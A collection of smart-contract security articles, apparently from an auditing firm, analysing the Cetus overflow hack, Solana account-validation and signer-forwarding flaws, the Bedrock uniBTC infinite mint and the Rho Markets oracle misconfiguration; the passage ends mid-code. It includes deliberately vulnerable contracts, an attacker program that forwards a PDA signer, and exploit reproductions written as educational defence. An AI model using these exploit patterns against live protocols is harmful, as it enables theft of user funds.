    The root cause lies in the get_delta_a function within clmm_math.move, which calculates the amount of token A required for a given liquidity amount:

    public fun get_delta_a(
        sqrt_price_0: u128,
        sqrt_price_1: u128,
        liquidity: u128,
        round_up: bool
    ): u64 {
        let sqrt_price_diff = sqrt_price_1 - sqrt_price_0;
        
        let (numberator, overflowing) = math_u256::checked_shlw(
            // Dedaub: result doesn't fit in 192 bits
            full_math_u128::full_mul(liquidity, sqrt_price_diff)
        );
        // Dedaub: the flawed checked_shlw reports no overflow,
        // even though the subsequent << 64 wraps past 256 bits
        assert!(!overflowing);
        
        let denominator = full_math_u128::full_mul(sqrt_price_0, sqrt_price_1);
        let quotient = math_u256::div_round(numberator, denominator, round_up);
        (quotient as u64)
    }

    The Mathematical Breakdown

    Using the actual values from the transaction:

    • liquidity: 10,365,647,984,364,446,732,462,244,378,333,008 (approximately 2^113)
    • sqrt_price_0: 60,257,519,765,924,248,467,716,150 (tick 300000)
    • sqrt_price_1: 60,863,087,478,126,617,965,993,239 (tick 300200)
    • sqrt_price_diff: 605,567,712,202,369,498,277,089 (approximately 2^79)

    The critical calculation:

    numerator = checked_shlw(liquidity * sqrt_price_diff)
              = checked_shlw(~2^113 * ~2^79)
              = checked_shlw(2^192 + ε)
              // checked_shlw shifts a 256-bit register left by 64
              = ((2^192 + ε) * 2^64) mod 2^256
              = ε * 2^64

    This multiplication produces a result exceeding 192 bits. When this value is left-shifted by 64 bits in checked_shlw (i.e., “checked shift left by one 64-bit word”), it overflows a 256-bit integer, but the check designed to detect exactly this condition fails to fire.
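    Assuming the quoted transaction values are exact, the wrap can be reproduced with arbitrary-precision arithmetic. This is a plain Python sketch, not the Move code:

```python
# Values quoted above from the attack transaction
liquidity    = 10_365_647_984_364_446_732_462_244_378_333_008
sqrt_price_0 = 60_257_519_765_924_248_467_716_150
sqrt_price_1 = 60_863_087_478_126_617_965_993_239

sqrt_price_diff = sqrt_price_1 - sqrt_price_0   # ~2^79

product = liquidity * sqrt_price_diff           # 2^192 + ε: needs 193 bits
numerator = (product << 64) % (1 << 256)        # models Move's silent wrap at 256 bits

denominator = sqrt_price_0 * sqrt_price_1
tokens_required = numerator // denominator      # ~0; rounding up yields the 1 unit paid
```

    Note how carefully the liquidity value was chosen: the product lands barely above 2^192, so after the wrap only a negligible numerator survives.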

    But wait. Isn’t a checked operation supposed to prevent this issue?

    The Flawed Overflow Check

    The critical flaw lies in the checked_shlw function:

    public fun checked_shlw(n: u256): (u256, bool) {
        let mask = 0xffffffffffffffff << 192;  // This is incorrect!
        if (n > mask) {
            (0, true)
        } else {
            ((n << 64), false) // exact location of overflow
        }
    }

    The mask calculation 0xffffffffffffffff << 192 doesn’t produce the intended result: it evaluates to 2^256 − 2^192, so the n > mask test only catches values in the topmost sliver of the 256-bit range. The developers likely intended to check if n >= (1 << 192), but the actual mask doesn’t serve this purpose. As a result, most values greater than 2^192 pass through undetected, and the subsequent left shift by 64 bits causes a silent overflow in Move (which doesn’t trigger runtime errors for shift operations).

    Integer Considerations

    In Move, the security around integer operations is designed to prevent overflow and underflow, which can cause unexpected behavior or vulnerabilities. Specifically:

    • Additions (+) and multiplications (*) cause the program to abort if the result is too large for the integer type. An abort in this context means that the program will terminate immediately.
    • Subtractions (-) abort if the result is less than zero.
    • Division (/) aborts if the divisor is zero.
    • Left Shift (<<), uniquely, does not abort in the event of an overflow. This means if the shifted bits exceed the storage capacity of the integer type, the program will not terminate, resulting in incorrect values or unpredictable behavior.

      It is normal for languages with checked arithmetic to not trigger errors when bit shifting truncates the result. Most smart contract auditors understand this.

    The Exploitation Impact

    Due to the overflow, the numerator wraps around to a very small value. When divided by the denominator, it produces a quotient close to 0. As a result, the function reports that only 1 unit of token A is required to mint the massive liquidity position.

    In mathematical terms:

    • Expected: a very large number of tokens required
    • Actual (due to overflow): 1 token required

    It is worth noting that the numeric values involved in the attack are precisely calculated – the attacker utilized some existing functions in the contract to compute these, notably get_liquidity_from_a.

    The Audit Trail: Similar Issue Found Before

    Ottersec’s audit identified an eerily similar overflow vulnerability in an earlier variant of the code (early 2023), specifically designed for Aptos:

    “The numberator value is not validated before running u256::shlw on it. As a result, the non-zero bytes might be removed, which leads to an incorrect calculation of the value.”

    They recommended replacing u256::shlw with u256::checked_shlw and adding overflow detection, which solved the issue. Note that this version of the code had custom implementations of 256-bit unsigned integer operations, since Aptos didn’t support them natively at the time. (Native support, via Move 2 / Aptos CLI ≈ v1.10, rolled out to mainnet in early 2024.)

    It is really unfortunate that when the team ported the code to Sui a couple of months later (Sui has always supported 256-bit integers), a bug was introduced in checked_shlw. Audits of this version of the AMM by Ottersec and MoveBit did not find this issue. A subsequent audit by Zellic in April 2025 found no issues beyond informational findings. It is possible that library code performing numerical calculations was out of scope; moreover, since 256-bit operations are natively supported, issues like these could have been overlooked.

    Lessons for Developers

    1. Understand Your Language’s Integer Semantics

    • Know which operations abort and which silently overflow
    • Pay special attention to bit shift operations
    • Test your overflow checks with actual overflow conditions

    2. Mathematical Rigor is Non-Negotiable

    • DeFi protocols need to handle extreme values by design
    • The bounds of every mathematical operation need to be clearly understood
    • Consider using formal methods for verifying critical calculations (our team can assist)

    3. Test Edge Cases Exhaustively

    • Maximum values aren’t theoretical – they’re attack vectors
    • Combine multiple edge cases

    4. Audit Fixes, Not Just Changes

    • Consider independent verification of critical fixes

    5. Domain Expertise Matters

    • AMM mathematics involves complex invariants
    • Work with auditors who understand DeFi edge cases

    In DeFi, edge cases aren’t edge cases – they’re attack vectors. AMMs are particularly vulnerable as they involve complex mathematical operations across extreme ranges. The Cetus hack demonstrates that even “checked” operations require careful verification.

    Conclusion

    The Cetus hack serves as a stark reminder that security in DeFi is hard, but not impossible to achieve. A single flawed overflow check, combined with the composability of flash loans and concentrated liquidity mechanics, enabled the theft of over $200 million.

    For developers building on Move-based chains like Sui and Aptos, this incident underscores the importance of understanding your language’s integer semantics, rigorously testing edge cases, and working with auditors who deeply understand both the platform and the DeFi domain.

    Contact us at Dedaub if you need help securing your Aptos or Sui Network project – our team specializes in the mathematical complexities and edge cases that come up in complex DeFi protocols.

  • From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

    From Ethereum to Solana: How Developer Assumptions Can Introduce Critical Security Vulnerabilities

     Ethereum Developers on Solana

    Solana stands out as one of the most popular blockchains, known for its high throughput and scalability that position it as an attractive alternative to Ethereum. These benefits arise from Solana’s distinctive architecture, which is markedly different from Ethereum’s design. While these architectural differences underlie many of Solana’s strengths, they also introduce unique risks that may be unfamiliar to developers transitioning from Ethereum. In this article, we will explore some common errors that Ethereum developers might make when building Solana programs, given the vastly different security models of the two platforms.

    Proper Account Validation

    State in Ethereum is tightly associated with the smart contract code that controls it. Each contract on Ethereum has a unique storage space that cannot be written to by any other contract. Solana takes a very different approach, separating executable code, called programs, from other types of accounts. This introduces an additional complexity, which can easily be overlooked by Ethereum developers: account validation.

    On Solana, users must provide all the accounts on which a program operates. This means that if the program does not enforce the appropriate constraints and validations, a malicious user may inject unexpected accounts, which could lead to critical vulnerabilities. Specifically, all accounts should be checked for correct ownership, correct type, correct address if a specific account is expected, and correct relations with other accounts expected by the program. All of these validations are made simpler using the Anchor framework. However, missed checks and validations are still possible even when leveraging these tools, especially when using remaining_accounts, on which Anchor imposes no checks. For example, consider the following snippet from a simple lending program:

    
    pub fn liquidate_collateral(ctx: Context<LiquidateCollateral>) -> Result<()> {
        let borrower = &mut ctx.accounts.borrower;
        let collateral = &mut ctx.accounts.collateral;
        let liquidator = &mut ctx.accounts.liquidator;
    
        let collateral_in_usd = get_value_in_usd(collateral.amount, collateral.mint);
        let borrowed_amount_in_usd = get_value_in_usd(borrower.borrowed_amount, borrower.mint);
    
        if collateral_in_usd * 100 < borrowed_amount_in_usd * 150 {
            withdraw_from(liquidator, borrower.borrowed_amount);
            transfer_collateral_to_liquidator(ctx);
            let liquidated_amount = collateral.amount;
    
            borrower.borrowed_amount = 0;
            msg!(
                "Liquidated {} collateral tokens due to insufficient collateralisation.",
                liquidated_amount
            );
        } else {
            msg!("Collateralisation ratio is sufficient; no liquidation performed.");
        }
        Ok(())
    }
    
    
    #[derive(Accounts)]
    pub struct LiquidateCollateral<'info> {
        #[account(mut)]
        pub borrower: Account<'info, BorrowerAccount>,
    
        #[account(mut)]
        pub collateral: Account<'info, TokenAccount>,
    
        #[account(mut)]
        pub liquidator: Account<'info, TokenAccount>,
    
        /// CHECK: signer PDA for collateral account
        pub collateral_signer: UncheckedAccount<'info>,
    
        pub token_program: Program<'info, Token>,
    }
    

    This function simply checks the collateralisation ratio of a loan and performs liquidation if the ratio is below 1.5. A similar program on Ethereum would likely store collateral data in a mapping, whether in the same contract or a different one. This would require the contract developer to explicitly specify a key for the mapping. However, on Solana, it is the user that chooses the account as opposed to the developer.

    Hence, while at first glance this may seem secure coming from Ethereum, the instruction handler is missing a crucial check. Built-in Anchor checks ensure that all accounts are of the correct type and have the correct owner; however, there is no check that ensures the collateral account provided is associated with the borrower provided. This means an attacker could provide an arbitrary borrower account and the collateral account of a different borrower. This effectively allows the attacker to liquidate any collateral account, regardless of its collateralisation ratio, by finding (or creating) a borrower account that is just below the required ratio.
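    The exploit path can be modeled in a few lines of plain Python (a toy model with hypothetical names, not Anchor code): without a constraint tying the collateral account to the borrower, a healthy borrower's collateral can be seized against someone else's bad loan.

```python
from dataclasses import dataclass

@dataclass
class Borrower:
    key: str
    borrowed_usd: int
    collateral_key: str          # the collateral account this borrower really owns

@dataclass
class Collateral:
    key: str
    value_usd: int

def can_liquidate(borrower: Borrower, collateral: Collateral,
                  check_association: bool) -> bool:
    # The missing constraint: the provided collateral must belong to the borrower
    if check_association and borrower.collateral_key != collateral.key:
        raise ValueError("collateral not associated with borrower")
    # Mirrors the handler above: liquidate if the collateralisation ratio < 1.5
    return collateral.value_usd * 100 < borrower.borrowed_usd * 150

# Alice is just under the required ratio; Bob's position is perfectly healthy.
alice = Borrower("alice", borrowed_usd=100, collateral_key="alice_coll")
bob_collateral = Collateral("bob_coll", value_usd=140)

# Without the association check, an attacker liquidates Bob's collateral by
# pairing it with Alice's undercollateralised loan: 140*100 < 100*150.
assert can_liquidate(alice, bob_collateral, check_association=False)
```

    With the association check enforced (as Anchor constraints would do on-chain), the same call raises instead of liquidating.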

    This example demonstrates the dangers of insufficient account validation, especially transitioning from Ethereum development, where such validations do not exist. While Ethereum’s model tightly couples state with the source code, limiting potential interference from external actors, Solana’s separation of executable programs and accounts demands that developers take extra precautions. On Solana, every account passed into a program must be meticulously checked for proper ownership, type, and expected relationships.

    Signer Account Forwarding

    On Ethereum, authorisation is quite straightforward. The global variable msg.sender can be used to securely determine the immediate caller of the function, which is often enough to authorise privileged actions. On Solana, a similar approach can be employed, leveraging signer accounts.

    Signer accounts in Solana serve as the entities that have provided a valid signature for a transaction, confirming their intent and authority to perform an action. These accounts can either be traditional user keypairs, where a private key directly authorises actions, or Program Derived Addresses (PDAs). PDAs are account addresses deterministically generated from a set of seeds and a program ID. Unlike keypairs, PDAs do not have a private key. Only the program from which a PDA is derived can mark it as a signer account, using the invoke_signed function.

    Unlike msg.sender, a signer account does not securely determine the immediate caller. Programs in Solana are allowed to invoke other programs with the same signer accounts they themselves were invoked with, effectively forwarding signer accounts.

    Solana programs can call other programs through CPI (Cross-Program Invocation). There are two ways to perform CPI: invoke and invoke_signed. As mentioned earlier, invoke_signed is used to mark a PDA account (which must be derived from the calling program) as a signer for the CPI. The invoke function, on the other hand, does not add any signers. Both functions can forward signer accounts that are already marked as signers.

    Hence, when a user or program provides a signer account, they are essentially entrusting downstream programs with a piece of verified authority. The vulnerability emerges when this trust is misplaced. If an untrusted program is invoked with a signer account that possesses sensitive privileges, it can forward this signer with arbitrary arguments to exploit these privileges. For instance, an attacker might leverage this oversight to perform operations on behalf of an unsuspecting user.

    Programs are especially at risk when performing a signed CPI on a program that can be determined or influenced by the user. A malicious user may intentionally direct the CPI to a malicious program, effectively hijacking the signer account to impersonate the vulnerable program. The severity of the issue could be even further elevated if the CPI allows the user to specify remaining_accounts to increase the flexibility of the call. While this significantly increases the flexibility and composability of Solana programs for legitimate users, it also carries additional risks. An attacker exploiting insecure signature handling may be able to leverage these remaining_accounts to include any required additional accounts that are necessary to make a privileged call.

    Consider the below timelock program:

    /// Queue an arbitrary task with a specified delay.
    /// The caller provides the target program, instruction data (task_data), 
    /// and a delay (in seconds) that determines when the task can be executed.
    
    pub fn queue_task(
        ctx: Context<QueueTask>, 
        task_data: Vec<u8>, 
        target_program: Pubkey, 
        delay: i64
    ) -> ProgramResult {
    
        let task = &mut ctx.accounts.task;
    
        // Get the current unix timestamp
        let clock = Clock::get()?;
    
        task.release_time = clock.unix_timestamp + delay;  // set execution time to now + delay
        task.target_program = target_program; // target program to invoke on execute
        task.authority = *ctx.accounts.authority.key; // task creator stored for authorisation
    
        task.task_data = task_data; // arbitrary instruction data
    
        Ok(())
    }
    
    
    
    #[derive(Accounts)]
    pub struct QueueTask<'info> {
        #[account(
            init, 
            payer = authority, 
            space = 8 + Task::LEN,
        )]
    
        pub task: Account<'info, Task>,
    
        #[account(mut)]
        pub authority: Signer<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This program allows anyone to queue a task with an arbitrary delay, storing the creator of the task for authorisation purposes. The program and arguments are controlled by the creator. Now consider this program’s execute function:

    /// Execute the queued task.
    /// Anyone can call this instruction, but the task will only execute if the timelock has expired.
    
    pub fn execute_task(ctx: Context<ExecuteTask>) -> ProgramResult {
        let task = &ctx.accounts.task;
    
        // Ensure the timelock has passed
        let clock = Clock::get()?;
        if clock.unix_timestamp < task.release_time {
            return Err(ErrorCode::TimelockNotExpired.into());
        }
    
        let cpi_accounts: Vec<AccountMeta> = std::iter::once(&ctx.accounts.task_authority)
            .chain(ctx.remaining_accounts.iter())
            .map(|acc| AccountMeta {
                pubkey: *acc.key,
                is_signer: acc.is_signer,
                is_writable: acc.is_writable,
            })
            .collect();
    
        let ix = Instruction {
            program_id: task.target_program,
            accounts: cpi_accounts,
            data: task.task_data.clone(),
        };
    
        invoke_signed(&ix, ctx.remaining_accounts, &[&[TIMELOCK_SIGNER]])?;
        Ok(())
    }
    
    #[derive(Accounts)]
    pub struct ExecuteTask<'info> {
        #[account(mut, close = authority)]
        pub task: Account<'info, Task>,
    
        #[account(address = task.authority)]
        pub task_authority: AccountInfo<'info>,
    
        /// This is only needed to receive the lamports from the closing account.
        #[account(mut)]
        pub authority: Signer<'info>,
    
        #[account(
            seeds = [TIMELOCK_SIGNER],
            bump
        )]
        pub timelock_signer: UncheckedAccount<'info>,
    
        pub system_program: Program<'info, System>,
    }

    This execute function allows anyone to execute the task once the time has elapsed, with the original task creator being prepended to the accounts list for authorisation purposes. To an Ethereum developer, this may appear secure. However, under Solana’s security model, this program contains a critical error.

    The CPI in the execute_task function uses the same signer PDA for all tasks. This means a malicious task could misuse the signer to impersonate the timelock program. Suppose an attacker were to create the following program:

    #[program]
    pub mod malicious_program {
        use super::*;
        // This instruction forwards the signer account via CPI to the vulnerable program.
        // The vulnerable program then believes that the forwarded account legitimately signed.
        pub fn forward_signer(ctx: Context<ForwardSigner>) -> Result<()> {
            // the timelock's signed PDA is forwarded from remaining_accounts
            let accounts = vec![AccountMeta::new(ctx.remaining_accounts[0].key(), true)];
            let instruction_data: Vec<u8> = vec![]; // attacker controlled data
            let instruction = Instruction {
                program_id: ctx.accounts.target_program.key(),
                accounts,
                data: instruction_data,
            };
    
            invoke(&instruction, ctx.remaining_accounts)?;
            Ok(())
        }
    }
    
    #[derive(Accounts)]
    pub struct ForwardSigner<'info> {
        /// CHECK: This is the attacker's key as they created the malicious task
        pub ignored_task_creator: UncheckedAccount<'info>,
        /// CHECK: This is the target program's ID
        pub target_program: UncheckedAccount<'info>,
    }
    

    This program is designed to receive a CPI from the timelock program, strip away the task creator account that is intended for a vital security check and redirect the call (timelock signature intact) to a different program. If an unsuspecting program exposes a privileged function to the timelock, using the first account as authorisation, the attacker can exploit this. First, simply queue a task with minimal delay to this malicious program, then execute the task providing the target program, followed by the accounts list required for the target invocation. This CPI would be indistinguishable from a legitimate CPI from the timelock. Hence, the attacker can bypass the delay of any existing tasks in the timelock and potentially execute functions they are not authorised to execute.
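    The laundering of the PDA signature can be sketched as a toy model in plain Python (programs as functions, accounts as (key, is_signer) pairs; all names are hypothetical, this is not Solana code):

```python
# Toy model: an account is a (key, is_signer) tuple; a program is a function.

def victim_program(accounts):
    # A program that grants a privileged action to the timelock's PDA,
    # trusting "first account is the timelock signer" as its authorisation.
    key, is_signer = accounts[0]
    if key != "timelock_pda" or not is_signer:
        raise PermissionError("not authorised")
    return "privileged action performed"

def malicious_program(accounts):
    # Mirrors forward_signer: drops the prepended task-creator account and
    # forwards the still-signed timelock PDA straight to the victim.
    timelock_pda = accounts[-1]
    return victim_program([timelock_pda])

def execute_task(target_program, remaining_accounts):
    # Mirrors execute_task: prepends the task creator for "authorisation",
    # then performs a CPI signed with the shared timelock PDA.
    accounts = [("attacker", False)] + remaining_accounts + [("timelock_pda", True)]
    return target_program(accounts)

# The attacker's queued task targets malicious_program; once the (minimal)
# delay passes, the timelock's signature reaches the victim unchecked.
result = execute_task(malicious_program, [])
```

    The victim cannot distinguish this laundered call from a legitimate CPI issued directly by the timelock, which is exactly the problem described above.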

    This example illustrates the dangers of misunderstanding Solana’s security model. In essence, mishandling signer accounts can transform a useful delegation mechanism into an exploitable backdoor, where an attacker could chain CPIs to bypass critical authorisation checks. The authority given to signer accounts should be carefully considered, and no single signer account should be used to authorise multiple actions.

    Ethereum Developers on Solana: Conclusion

    The transition from Ethereum to Solana requires certain security assumptions to be reconsidered. Inadequate account verification and unchecked signer account forwarding can open doors for exploitation. Developers must enforce strict ownership, type checks, relationship validations, and signer handling among accounts to mitigate risks. Embracing Solana’s distinct model calls for a careful and updated approach to program design, ensuring robust protection against vulnerabilities inherent in its architecture.


    Brought to you by Dedaub, the home of the best EVM bytecode decompiler.

  • Bedrock vulnerability disclosure and actions

    Bedrock vulnerability disclosure and actions

    Bedrock vulnerability

    A few hours ago, the Dedaub team discovered a smart contract vulnerability in a number of uniBTC vault smart contracts in the Bedrock project. We disclosed the issue to the Bedrock account on Twitter and soon thereafter (after no response in 20 mins) to SEAL 911 for immediate investigation and action.

    A SEAL 911 war room, under the guidance of @pcaversaccio, was created and we frantically tried for two hours to reach Bedrock developers. At that time, blackhats exploited the vulnerability for a $1.8m loss. However, given that this was an infinite-mint vulnerability on the uniBTC token, it is perhaps fair to assess that the damage was contained. Most of the potential losses were averted by pausing third party protocols exposed to the at-risk funds, including Pendle and Corn. Notably, Pendle had over $30M of liquidity on the Corn network for the vulnerable asset. On Ethereum, the market cap of uniBTC was $75M, which an infinite mint renders worthless, and the asset was deployed in (at least) 8 networks.

    Root Cause

    The root cause of this vulnerability is a mismatched calculation of the exchange rate between Ethereum and Bitcoin in one path of the minting logic. In turn, this allows anyone who deposits Ethereum into the vulnerable vault contract to mint uniBTC in equal amounts. (Up until the vulnerability, uniBTC could exit to Wrapped Bitcoin at 1:1 rates.) Since the price of Ethereum is many times lower than the price of BTC, this creates an instant profit for any attacker exploiting any of these vaults. The vulnerable vault contract was a permissioned minter for uniBTC, so infinite amounts could be minted. The only adjustment made in this minting function is appropriate scaling for the decimals of the assets.
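    The economics are easy to see with illustrative prices (assumed round numbers, not the exact market prices at exploit time):

```python
# Illustrative prices only; actual prices at exploit time differed.
eth_price_usd, btc_price_usd = 2_400, 60_000

deposit_eth = 10
minted_unibtc = deposit_eth          # the bug: a 1:1 mint after decimal scaling

cost   = deposit_eth * eth_price_usd      # USD paid in
payout = minted_unibtc * btc_price_usd    # USD out, since uniBTC exited 1:1 to WBTC
profit = payout - cost                    # repeatable at will: an infinite mint
```

    At these assumed prices every deposited ETH returns roughly 25x its value, and nothing limits how often the mint can be repeated.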

    In order to appreciate the gravity of this issue, we can illustrate this directly on the following code, straight from the vulnerable uniBTC vault smart contract (the implementation behind the proxy for the Vault):

    function mint() external payable {
        require(!paused[NATIVE_BTC], "SYS002");
        // Dedaub: adjust decimals and mint equal amount
        _mint(msg.sender, msg.value); 
    }

    Once the issue is exploited, the next step of a potential attacker would be to make use of this ill-gotten token on a number of other DeFi protocols, such as decentralized exchanges like Uniswap.

    Reporting the issue to Bedrock and exploitation

    As soon as our team had confirmed the issue, we contacted Bedrock on Twitter and entered a war room on SEAL 911.

    Initial X.com exchange (time in UTC+2).

    Unfortunately, even though we found the issue in the smart contract several hours earlier, by the time the team responded the vulnerability had been exploited. The vulnerability could be discovered via shallow means (e.g., fuzzing bots), and the smart contract had been deployed for under two days.

    Timeline prior to exploit:

    UTC 16:00 – issue discovered by Dedaub team and confirmed through simulation

    UTC 16:27 – issue reported to Bedrock team

    UTC 16:41 – war room with SEAL 911 created on Telegram

    UTC 18:28 – First exploit transaction on Ethereum

    The exploiter(s) subsequently minted large amounts of uniBTC and swapped them on a number of Uniswap and other AMM pools, stealing around $2M in funds directly. Note that the market cap of uniBTC on the Ethereum mainnet is $75M, which is the real potential loss for an infinite mint vulnerability.

    Notably, the vulnerable contract was deployed on (at least) 8 different chains. We are aware of Ethereum, Binance, Arbitrum, Optimism, Mantle, Mode, BOB, and ZetaChain.

    Averting Larger Losses

    In addition to a number of pools on Uniswap (and Pancakeswap on Binance), the largest holder of uniBTC was Pendle. Luckily, through war room actions, the Pendle team disabled the uniBTC token on their platform. With the main exit liquidity gone, the Bedrock team reacted some hours later (with the main devs in a 2-5am timezone) to also pause the relevant vaults.

    This article will be updated with more detail and context on the discovery (which happened as part of a challenge task during our company retreat) in the next days.

  • Rho Markets Incident

    Rho Markets Incident

    On July 19th, Rho Markets — a Compound V2 fork on Scroll — was involved in an incident that led to the creation of $7.5M in bad debt. The root cause was a misconfiguration of the ETH oracle (its address was set to the wrong price feed at initialization time), not a bug in the code. The price misalignment was quickly exploited by an MEV bot that observed the opportunity.

    Fortunately, lost funds were returned due to the quick and coordinated efforts between the protocol team and SEAL 911 (of which we are also part). That being said, the willingness of the MEV Bot operator behind the incident to co-operate with the protocol and return the funds significantly sped up the recovery.

    One may also read Rho Markets’ official statement [tweet | blog] on the incident, which does a great job of explaining the circumstances that led to the loss of funds.

    Technical Details

    The misconfiguration

    Quoting Rho Markets’ incident report:

    This issue occurred due to the erroneous configuration of the ETH oracle price feed to the BTC price feed. Normally, such settings are validated before any changes are implemented. However, due to a human error in overseeing the deployment process, this validation check was missed in the case of the oracle price.

    The on-chain misconfiguration of the PriceOracleV2 contract occurred in this transaction: https://scrollscan.com/tx/0x9d2388a0c449c6265b968d86f0f54e75a5b82e2b04176e35eefdff5f135547ec#eventlog

    As can be seen from the emitted event, the transaction has the effect of erroneously setting the oracle for the underlying asset at address(0) to be the WBTC/USD oracle.

    At the time of the transaction, the configuration for the rWBTC token ( 0x1d7.. ) had not been set inside the oracle contract:

This is also evident from the fact that no calls to PriceOracleV2's setRTokenConfig function were performed between rWBTC's deployment on block 7579842 and the oracle update on block 7580111.

The problem with setting the oracle for the asset at address(0) is that, as stated before, this address represents the underlying token of rETH (ETH) [configuration of rETH].

    Rho Markets Incident

This is a notion inherited from Compound's semantics:

    Screenshot depicting the configuration of ETH in Compound’s UniswapAnchoredView contract — the second address in the tuple is the underlying address

    The consequences of the misconfiguration

    At this point we can note that no contract code was vulnerable or broken, since the setter of the price oracle functioned as intended.

However, this misconfiguration alone was enough to enable the arbitrage opportunity that an MEV bot exploited. Since all ETH collateral was priced at the value of WBTC (roughly 20x the actual price of ETH), the bot could borrow far more funds than ETH collateral should normally allow, which led to the creation of bad debt.
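To make the magnitude concrete, here is a minimal Python sketch of the mispricing, using round, hypothetical prices and a hypothetical collateral factor rather than the exact on-chain values at the time:

```python
# Hypothetical round numbers for illustration; not the exact feed readings.
eth_price = 3_400         # true ETH/USD price
wbtc_price = 68_000       # WBTC/USD feed mistakenly used for ETH
collateral_factor = 0.85  # hypothetical loan-to-value ratio

collateral_eth = 84       # ETH deposited as collateral
true_value = collateral_eth * eth_price
mispriced_value = collateral_eth * wbtc_price

inflation = mispriced_value / true_value          # 20x with these numbers
borrow_limit_usd = mispriced_value * collateral_factor
```

With the WBTC feed quoting roughly 20x the price of ETH, every unit of ETH collateral supported about 20x the borrowing it should have.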

The MEV bot performed multiple transactions like this one: https://scrollscan.com/tx/0x0a7b4c6542eb8f37de788c8848324c0ae002919148a4426903b0fb4149f88f05

As one may see, the bot mints ~84 rETH but successfully manages to borrow ~942 wstETH, which it then swaps into ETH.

The total amount of bad debt created by this method ended up being ~$7.5 million.

    Return of funds

The war room set up with the protocol team and SEAL 911 was quick to gather information on the attack and on the operator of the MEV bot. In the end, however, the bot operator acted in good faith and contacted the protocol team to return the funds:

    https://etherscan.io/tx/0xab7bc87fca7df222000b870fbe55750c33b3ea0461a8ba8a8ddbe530a1934248

    https://scrollscan.com/tx/0xd9c2e4f0364b13ada759f2dd56b65f5025e70cce4373e7c57ac31bf5226023e0

    Hello RHO team, our MEV bot have profited from your price oracle misconfiguration. We understand that the funds belong to users and are willing to fully return. But first we would like you to admit that it was not an exploit or a hack, but a misconfiguration on your end. Also, please provide what are you going to do to prevent it from happening again.

    Funds were successfully returned at: https://scrollscan.com/tx/0x15da6af0207d82d27ca20a542dae1b81580ca1cbfee7028c312229968e356446

    Takeaways

The incident highlights the importance of rigorously reviewing deployment procedures. Even when there are no smart contract vulnerabilities, protocols must ensure that configuration updates do not break any invariants assumed by the protocol's complex modules.

    We’d like to thank Rho Markets for their quick action and transparency on the issue, as well as all the members of SEAL 911 who also participated in the war room with us.

  • Web 3 Audit Methodology by Dedaub

    Web 3 Audit Methodology by Dedaub

    Dedaub’s Security Audit teams comprise at least two senior security researchers, as well as any support they may need (e.g., cryptography expertise, financial modeling, testing) from the rest of our team. We carefully match the team’s expertise to your project’s specific nature and requirements. Our auditors conduct a meticulous, line-by-line review of every contract within the audit scope, ensuring that each researcher examines 100% of the code. There is no substitute for deep understanding of the code and forming a thorough mental model of its interactions and correctness assumptions.

    Web3 Audit Methodology | 4 Main Strategies

    Reaching this level of understanding is the goal of a Dedaub audit based on our Web3 audit methodology. To achieve this, we employ strategies such as:

    • Two-phase review: during phase A, the auditors understand the code in terms of functionality, i.e., in terms of legitimate use. During phase B, the auditors assume the role of attackers and attempt to subvert the system’s assumptions by abusing its flexibility.
• Constant challenging between the two senior auditors: the two auditors continuously challenge each other, trying to identify blind spots. An auditor who claims to have covered and understood part of the code is often challenged to explain its difficult elements to the other auditor.
    • Thinking at multiple levels: beyond thinking of adversarial scenarios in self-contained parts of the protocol, the auditors explicitly attempt to devise complex combinations of different parts that may result in unexpected behavior.
    • Use of advanced tools: every project is uploaded to the Dedaub Security Suite for analysis by over 70 static analysis algorithms, AI, and automated fuzzing. The auditors often also write and run manual tests on possible leads for issues. Before the conclusion of the audit, the development team gets access to the online system with our automated analyses, so they can see all the machine-generated warnings that the auditors also reviewed.

    Dedaub’s auditors also identify gas inefficiencies in your smart contracts and offer cost optimization recommendations. We thoroughly audit integrations with external protocols and dependencies, such as AMMs, lending platforms, and Oracle services, to ensure they align with their specifications.

  • Common Solidity Security Vulnerabilities

    Solidity Security Vulnerabilities

    Understanding and Mitigating Solidity Security Vulnerabilities

Solidity security vulnerabilities are a critical concern for developers building smart contracts on the Ethereum blockchain and other EVM-compatible platforms. Solidity is the primary language for creating such contracts, enabling developers to build decentralized applications (DApps) that automate complex processes. However, the immutability and decentralized nature of blockchains make vulnerabilities in smart contracts especially critical: a single security flaw can result in the loss of millions of dollars in cryptocurrency, as demonstrated by numerous high-profile hacks.

    This guide looks at the most common Solidity security vulnerabilities.

    Access Control Failures

    One of the most common Solidity security vulnerabilities is the failure to protect sensitive external functions with an access control modifier. Usually, a contract will have some privileged functionality that should only be called by the contract’s owner, for instance, to configure some of its parameters. Failing to protect this with an access control modifier such as onlyOwner can lead to disastrous consequences, as any attacker will be able to modify the core behavior of the smart contract.
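As an illustration of the pattern (sketched in Python rather than Solidity, with names of our own choosing), an onlyOwner-style guard simply rejects calls from any account other than the owner:

```python
from functools import wraps

def only_owner(fn):
    """Reject calls whose caller is not the contract owner (illustrative)."""
    @wraps(fn)
    def guard(self, caller, *args, **kwargs):
        if caller != self.owner:
            raise PermissionError("caller is not the owner")
        return fn(self, caller, *args, **kwargs)
    return guard

class Config:
    def __init__(self, owner):
        self.owner = owner
        self.fee_bps = 0

    @only_owner
    def set_fee_bps(self, caller, fee_bps):
        # Privileged: changes a core protocol parameter
        self.fee_bps = fee_bps
```

Without the guard, any caller could invoke the setter and change the protocol's core behavior.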

    Unchecked External Calls

    Unchecked external calls can introduce significant Solidity security vulnerabilities.

Developers should control which contracts their application interacts with. Trusting arbitrary contracts and handing control to them means accepting that malicious contracts could interact with your application, which can lead to unintended behavior or even attacks.

    In general, developers should interact only with trusted contracts. If these contracts are unknown, they should implement a system that allows the contract owner to whitelist contracts on demand.

    Reentrancy Attacks

    Reentrancy is a notorious Solidity security vulnerability where an external contract can hijack the control flow of the target contract. These can occur when one of the smart contract’s external functions temporarily transfers control to another contract before continuing to execute its own state-modifying code. 

If the other contract is malicious, it can call back into the external function while the original call is still suspended at the point where control was handed over, re-executing the state-modifying code before the original call completes. This procedure is called re-entry, and it can allow an attacker to change the state of the contract in an undesirable manner.

    Developers can prevent this kind of attack by using the checks-effects-interactions pattern. This pattern ensures that all state changes occur before transferring control to an external contract. Any re-entry attempt produces a fresh call, avoiding interaction with partially executed computations.
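The control flow is easiest to see in a small Python simulation (not Solidity; all names are ours). The unsafe variant pays out before zeroing the balance, so a malicious receiver can re-enter and withdraw more than it deposited; the checks-effects-interactions variant zeroes the balance first:

```python
class Vault:
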